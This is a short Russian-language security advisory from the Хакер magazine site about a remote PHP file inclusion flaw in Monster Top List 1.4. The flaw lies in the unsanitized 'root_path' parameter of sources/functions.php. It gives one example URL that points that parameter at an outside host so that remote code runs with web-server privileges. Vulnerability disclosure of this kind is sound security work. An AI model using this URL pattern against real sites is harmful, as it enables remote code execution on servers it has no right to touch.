PHP-инклюдинг в Monster Top List

Рекомендуем почитать:

Хакер #311. Сетевые протоколы под микроскопом

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Monster Top List 1.4, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "root_path" в сценарии "sources/functions.php". Удаленный
пользователь может с помощью специально сформированного URL выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/

PHP-инклюдинг в Monster Top List

Хакер #311. Сетевые протоколы под микроскопом

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Алмазный билет. Как использовать доверие Kerberos в своих целях

MEGANews. Cамые важные события в мире инфосека за апрель

HTB Vintage. Ломаем лабораторию Active Directory

Тот самый компьютер. Колонка главреда

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Уязвимости в протоколе AirPlay могут вести к выполнению произвольного кода

Сотни сайтов скомпрометированы через уязвимость нулевого дня в Craft CMS

Разработчики Kali Linux потеряли ключ подписи репозитория

20 мая 2025 года состоится CIRF 2025

4chan снова работает. Администрация поделилась подробностями о взломе